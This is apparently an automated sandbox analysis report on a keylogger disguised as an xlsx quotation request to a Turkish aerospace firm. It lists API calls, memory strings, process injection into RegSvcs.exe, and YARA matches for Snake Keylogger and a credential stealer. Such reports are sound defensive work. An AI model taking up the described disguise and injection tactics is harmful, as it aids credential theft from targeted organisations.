Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_001FED6A

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

0_2_001FEAFF

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_001EAA57

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_00219576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00219576

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_84e6e452-3
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_abb4bc93-0
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6b2541d0-e
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3ef44b15-8

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001ED5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_001ED5EB

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_001E1201

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_001EE8F6

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0018BF40	0_2_0018BF40
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F2046	0_2_001F2046
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00188060	0_2_00188060
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001E8298	0_2_001E8298
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001BE4FF	0_2_001BE4FF
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001B676B	0_2_001B676B
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00214873	0_2_00214873
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001ACAA0	0_2_001ACAA0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0018CAF0	0_2_0018CAF0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0019CC39	0_2_0019CC39
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001B6DD9	0_2_001B6DD9
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0019B119	0_2_0019B119
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001891C0	0_2_001891C0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A1394	0_2_001A1394
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A1706	0_2_001A1706
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A781B	0_2_001A781B
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00187920	0_2_00187920
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0019997D	0_2_0019997D
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A19B0	0_2_001A19B0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A7A4A	0_2_001A7A4A
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A1C77	0_2_001A1C77
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A7CA7	0_2_001A7CA7
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0020BE44	0_2_0020BE44
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001B9EEE	0_2_001B9EEE
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A1F32	0_2_001A1F32
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_018A1DB8	0_2_018A1DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4A088	2_2_00D4A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4C147	2_2_00D4C147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4D278	2_2_00D4D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D45362	2_2_00D45362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4C468	2_2_00D4C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4C738	2_2_00D4C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4E988	2_2_00D4E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D469A0	2_2_00D469A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4CA08	2_2_00D4CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4CCD8	2_2_00D4CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D46FC8	2_2_00D46FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4CFAB	2_2_00D4CFAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4F631	2_2_00D4F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D429EC	2_2_00D429EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D439ED	2_2_00D439ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4E97B	2_2_00D4E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D4FA88	2_2_00D4FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D43AA1	2_2_00D43AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D43E09	2_2_00D43E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E9548	2_2_050E9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E9C70	2_2_050E9C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E5028	2_2_050E5028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EE258	2_2_050EE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050ED540	2_2_050ED540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050ED550	2_2_050ED550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EDDF1	2_2_050EDDF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E9C42	2_2_050E9C42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EFC68	2_2_050EFC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E9C63	2_2_050E9C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050ECCA0	2_2_050ECCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EEF51	2_2_050EEF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EEF60	2_2_050EEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E178F	2_2_050E178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E17A0	2_2_050E17A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EDE00	2_2_050EDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E1E70	2_2_050E1E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E1E80	2_2_050E1E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EE6AF	2_2_050EE6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EE6B0	2_2_050EE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E2968	2_2_050E2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050ED999	2_2_050ED999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050ED9A8	2_2_050ED9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E0006	2_2_050E0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EF802	2_2_050EF802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E5018	2_2_050E5018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EF810	2_2_050EF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E0040	2_2_050E0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050ED0F8	2_2_050ED0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EEB08	2_2_050EEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E9328	2_2_050E9328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E0B20	2_2_050E0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E0B30	2_2_050E0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E8B90	2_2_050E8B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E8BA0	2_2_050E8BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EF3B8	2_2_050EF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050EE24A	2_2_050EE24A

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: String function: 0019F9F2 appears 40 times
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: String function: 00189CB3 appears 31 times
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: String function: 001A0A30 appears 46 times

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1454744475.000000000438D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1452729037.00000000041E3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
